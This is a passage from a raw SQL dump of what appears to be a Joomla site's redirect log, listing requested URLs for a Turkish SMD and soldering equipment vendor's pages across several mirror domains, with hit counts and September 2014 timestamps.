00:00:00',301),(5261,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-09-01 19:52:51','0000-00-00 00:00:00',301),(5262,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=56&Itemid=0&lang=en','','','',1,0,'2014-09-01 20:21:07','0000-00-00 00:00:00',301),(5263,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-09-01 20:25:19','0000-00-00 00:00:00',301),(5264,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',3,0,'2014-09-01 20:54:32','0000-00-00 00:00:00',301),(5265,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-09-01 21:18:59','0000-00-00 00:00:00',301),(5266,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&Itemid=','','','',1,0,'2014-09-01 21:31:02','0000-00-00 00:00:00',301),(5267,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',4,0,'2014-09-01 22:23:15','0000-00-00 00:00:00',301),(5268,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-09-01 22:34:19','0000-00-00 00:00:00',301),(5269,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',3,0,'2014-09-01 23:53:13','0000-00-00 00:00:00',301),(5270,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-02 00:27:16','0000-00-00 00:00:00',301),(5271,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-09-02 01:15:38','0000-00-00 00:00:00',301),(5272,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-09-02 01:44:15','0000-00-00 00:00:00',301),(5273,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-09-02 02:08:58','0000-00-00 00:00:00',301),(5274,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-09-02 02:11:28','0000-00-00 00:00:00',301),(5275,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-09-02 02:11:59','0000-00-00 00:00:00',301),(5276,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',1,0,'2014-09-02 02:38:26','0000-00-00 00:00:00',301),(5277,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-02 02:40:59','0000-00-00 00:00:00',301),(5278,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=0&lang=tr','','','',1,0,'2014-09-02 03:25:41','0000-00-00 00:00:00',301),(5279,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=0&lang=en','','','',1,0,'2014-09-02 03:32:42','0000-00-00 00:00:00',301),(5280,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',2,0,'2014-09-02 03:44:16','0000-00-00 00:00:00',301),(5281,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-02 03:49:11','0000-00-00 00:00:00',301),(5282,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',1,0,'2014-09-02 03:55:43','0000-00-00 00:00:00',301),(5283,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',6,0,'2014-09-02 03:59:30','0000-00-00 00:00:00',301),(5284,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',2,0,'2014-09-02 04:17:28','0000-00-00 00:00:00',301),(5285,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-09-02 04:56:32','0000-00-00 00:00:00',301),(5286,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-02 05:11:47','0000-00-00 00:00:00',301),(5287,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=en','','','',1,0,'2014-09-02 05:38:36','0000-00-00 00:00:00',301),(5288,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',2,0,'2014-09-02 05:54:49','0000-00-00 00:00:00',301),(5289,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',1,0,'2014-09-02 06:17:59','0000-00-00 00:00:00',301),(5290,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-02 06:29:47','0000-00-00 00:00:00',301),(5291,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-09-02 06:44:58','0000-00-00 00:00:00',301),(5292,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-09-02 06:55:21','0000-00-00 00:00:00',301),(5293,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',2,0,'2014-09-02 07:07:51','0000-00-00 00:00:00',301),(5294,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',2,0,'2014-09-02 07:11:09','0000-00-00 00:00:00',301),(5295,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-02 07:27:13','0000-00-00 00:00:00',301),(5296,'http://www.3s-technologies.com.tr/index.php/en/?option=com_contact&view=category&catid=&lang=en','','','',10,0,'2014-09-02 08:11:31','0000-00-00 00:00:00',301),(5297,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr','','','',1,0,'2014-09-02 08:19:30','0000-00-00 00:00:00',301),(5298,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',3,0,'2014-09-02 09:52:43','0000-00-00 00:00:00',301),(5299,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-02 10:05:03','0000-00-00 00:00:00',301),(5300,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-09-02 10:51:10','0000-00-00 00:00:00',301),(5301,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=0&lang=tr','','','',1,0,'2014-09-02 14:28:38','0000-00-00 00:00:00',301),(5302,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-09-02 15:25:52','0000-00-00 00:00:00',301),(5303,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=0&lang=tr','','','',1,0,'2014-09-02 16:26:25','0000-00-00 00:00:00',301),(5304,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',3,0,'2014-09-02 18:01:28','0000-00-00 00:00:00',301),(5305,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',4,0,'2014-09-02 18:09:06','0000-00-00 00:00:00',301),(5306,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=&lang=en','','','',1,0,'2014-09-02 18:15:58','0000-00-00 00:00:00',301),(5307,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-09-02 18:17:30','0000-00-00 00:00:00',301),(5308,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=60&Itemid=0&lang=en','','','',1,0,'2014-09-02 18:48:03','0000-00-00 00:00:00',301),(5309,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=&lang=en','','','',1,0,'2014-09-02 19:25:15','0000-00-00 00:00:00',301),(5310,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-09-02 19:34:20','0000-00-00 00:00:00',301),(5311,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&limitstart=5&Itemid=','','','',1,0,'2014-09-02 20:07:38','0000-00-00 00:00:00',301),(5312,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',9,0,'2014-09-02 20:10:33','0000-00-00 00:00:00',301),(5313,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=&lang=tr','','','',5,0,'2014-09-02 20:17:21','0000-00-00 00:00:00',301),(5314,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=&lang=en','','','',1,0,'2014-09-02 20:23:36','0000-00-00 00:00:00',301),(5315,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=0&lang=en','','','',1,0,'2014-09-02 20:36:48','0000-00-00 00:00:00',301),(5316,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121','','','',1,0,'2014-09-02 21:21:33','0000-00-00 00:00:00',301),(5317,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115','','','',3,0,'2014-09-02 21:39:39','0000-00-00 00:00:00',301),(5318,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',6,0,'2014-09-02 21:56:04','0000-00-00 00:00:00',301),(5319,'http://www.3s-technologies.com.tr/index.php/en//images/stories/barner.gif','','','',1,0,'2014-09-02 22:01:10','0000-00-00 00:00:00',301),(5320,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121','','','',1,0,'2014-09-02 22:04:53','0000-00-00 00:00:00',301),(5321,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109','','','',1,0,'2014-09-02 22:06:07','0000-00-00 00:00:00',301),(5322,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-09-02 22:08:15','0000-00-00 00:00:00',301),(5323,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-09-02 22:47:02','0000-00-00 00:00:00',301),(5324,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=0&lang=tr','','','',1,0,'2014-09-02 23:22:39','0000-00-00 00:00:00',301),(5325,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-09-02 23:40:44','0000-00-00 00:00:00',301),(5326,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-03 00:02:53','0000-00-00 00:00:00',301),(5327,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',1,0,'2014-09-03 01:07:06','0000-00-00 00:00:00',301),(5328,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',1,0,'2014-09-03 01:26:07','0000-00-00 00:00:00',301),(5329,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-09-03 02:31:23','0000-00-00 00:00:00',301),(5330,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-09-03 02:36:15','0000-00-00 00:00:00',301),(5331,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-03 03:28:15','0000-00-00 00:00:00',301),(5332,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-09-03 03:28:20','0000-00-00 00:00:00',301),(5333,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-03 03:28:20','0000-00-00 00:00:00',301),(5334,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139','','','',3,0,'2014-09-03 05:52:40','0000-00-00 00:00:00',301),(5335,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',1,0,'2014-09-03 06:54:08','0000-00-00 00:00:00',301),(5336,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',2,0,'2014-09-03 07:10:43','0000-00-00 00:00:00',301),(5337,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-03 07:19:01','0000-00-00 00:00:00',301),(5338,'http://www.3s-technologies.com.tr/index.php/en/images/stories/food.php','','','',6,0,'2014-09-03 07:21:06','0000-00-00 00:00:00',301),(5339,'http://www.3s-technologies.com.tr/index.php/en/images/stories/petx.gif','','','',4,0,'2014-09-03 07:21:15','0000-00-00 00:00:00',301),(5340,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',3,0,'2014-09-03 09:14:46','0000-00-00 00:00:00',301),(5341,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',14,0,'2014-09-03 10:15:08','0000-00-00 00:00:00',301),(5342,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',3,0,'2014-09-03 10:18:40','0000-00-00 00:00:00',301),(5343,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=tr','','','',5,0,'2014-09-03 11:14:52','0000-00-00 00:00:00',301),(5344,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-03 11:39:36','0000-00-00 00:00:00',301),(5345,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=en','','','',5,0,'2014-09-03 12:17:48','0000-00-00 00:00:00',301),(5346,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-09-03 13:12:05','0000-00-00 00:00:00',301),(5347,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=tr','','','',1,0,'2014-09-03 15:14:43','0000-00-00 00:00:00',301),(5348,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&limitstart=5&Itemid=','','','',1,0,'2014-09-03 15:44:17','0000-00-00 00:00:00',301),(5349,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-03 17:59:34','0000-00-00 00:00:00',301),(5350,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',1,0,'2014-09-03 18:47:12','0000-00-00 00:00:00',301),(5351,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-09-03 19:01:36','0000-00-00 00:00:00',301),(5352,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',1,0,'2014-09-03 19:04:32','0000-00-00 00:00:00',301),(5353,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',1,0,'2014-09-03 19:20:05','0000-00-00 00:00:00',301),(5354,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',2,0,'2014-09-03 19:20:10','0000-00-00 00:00:00',301),(5355,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',1,0,'2014-09-03 19:48:52','0000-00-00 00:00:00',301),(5356,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',4,0,'2014-09-03 19:53:52','0000-00-00 00:00:00',301),(5357,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',1,0,'2014-09-03 20:05:28','0000-00-00 00:00:00',301),(5358,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=0&lang=tr','','','',1,0,'2014-09-03 20:21:10','0000-00-00 00:00:00',301),(5359,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112%3Asmd-firin-temizleme-roc&catid=40%3Atemizleme&Itemid=123&lang=en','','','',1,0,'2014-09-03 20:25:15','0000-00-00 00:00:00',301),(5360,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',2,0,'2014-09-03 20:26:24','0000-00-00 00:00:00',301),(5361,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',1,0,'2014-09-03 20:40:45','0000-00-00 00:00:00',301),(5362,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',1,0,'2014-09-03 20:41:25','0000-00-00 00:00:00',301),(5363,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',2,0,'2014-09-03 20:56:54','0000-00-00 00:00:00',301),(5364,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',1,0,'2014-09-03 20:56:58','0000-00-00 00:00:00',301),(5365,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=&lang=en','','','',5,0,'2014-09-03 23:29:45','0000-00-00 00:00:00',301),(5366,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=0&lang=en','','','',3,0,'2014-09-04 00:28:16','0000-00-00 00:00:00',301),(5367,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',1,0,'2014-09-04 00:31:20','0000-00-00 00:00:00',301),(5368,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',1,0,'2014-09-04 00:39:39','0000-00-00 00:00:00',301),(5369,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',2,0,'2014-09-04 00:41:27','0000-00-00 00:00:00',301),(5370,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=0&lang=tr','','','',1,0,'2014-09-04 02:29:50','0000-00-00 00:00:00',301),(5371,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',4,0,'2014-09-04 02:39:22','0000-00-00 00:00:00',301),(5372,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',3,0,'2014-09-04 03:18:12','0000-00-00 00:00:00',301),(5373,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-09-04 06:35:37','0000-00-00 00:00:00',301),(5374,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',5,0,'2014-09-04 06:42:42','0000-00-00 00:00:00',301),(5375,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=0&lang=tr','','','',1,0,'2014-09-04 06:44:30','0000-00-00 00:00:00',301),(5376,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-09-04 10:02:22','0000-00-00 00:00:00',301),(5377,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',5,0,'2014-09-04 10:13:36','0000-00-00 00:00:00',301),(5378,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',3,0,'2014-09-04 10:13:46','0000-00-00 00:00:00',301),(5379,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60','','','',2,0,'2014-09-04 10:44:21','0000-00-00 00:00:00',301),(5380,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-09-04 11:23:24','0000-00-00 00:00:00',301),(5381,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-09-04 12:12:22','0000-00-00 00:00:00',301),(5382,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',2,0,'2014-09-04 12:14:11','0000-00-00 00:00:00',301),(5383,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',2,0,'2014-09-04 13:27:50','0000-00-00 00:00:00',301),(5384,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',2,0,'2014-09-04 14:20:52','0000-00-00 00:00:00',301),(5385,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51&Itemid=0&lang=tr','','','',1,0,'2014-09-04 15:25:48','0000-00-00 00:00:00',301),(5386,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=60&Itemid=0&lang=tr','','','',1,0,'2014-09-04 16:19:34','0000-00-00 00:00:00',301),(5387,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-04 18:52:08','0000-00-00 00:00:00',301),(5388,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-09-04 19:22:41','0000-00-00 00:00:00',301),(5389,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-09-04 20:57:07','0000-00-00 00:00:00',301),(5390,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-09-04 21:02:03','0000-00-00 00:00:00',301),(5391,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-09-04 23:02:31','0000-00-00 00:00:00',301),(5392,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',2,0,'2014-09-05 00:29:10','0000-00-00 00:00:00',301),(5393,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',2,0,'2014-09-05 03:35:22','0000-00-00 00:00:00',301),(5394,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=0&lang=tr','','','',1,0,'2014-09-05 04:42:30','0000-00-00 00:00:00',301),(5395,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51&Itemid=0&lang=en','','','',1,0,'2014-09-05 05:02:28','0000-00-00 00:00:00',301),(5396,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-09-05 06:09:57','0000-00-00 00:00:00',301),(5397,'http://www.3s-technologies.com.tr/index.php/tr/p!�?o=3&g=&s=&z=�����������3�','','http://www.3s-technologies.com.tr/index.php/tr/?gclid=CN_s_Oi3ycACFYXJtAodz24Acw','',1,0,'2014-09-05 06:22:07','0000-00-00 00:00:00',301),(5398,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-09-05 06:23:50','0000-00-00 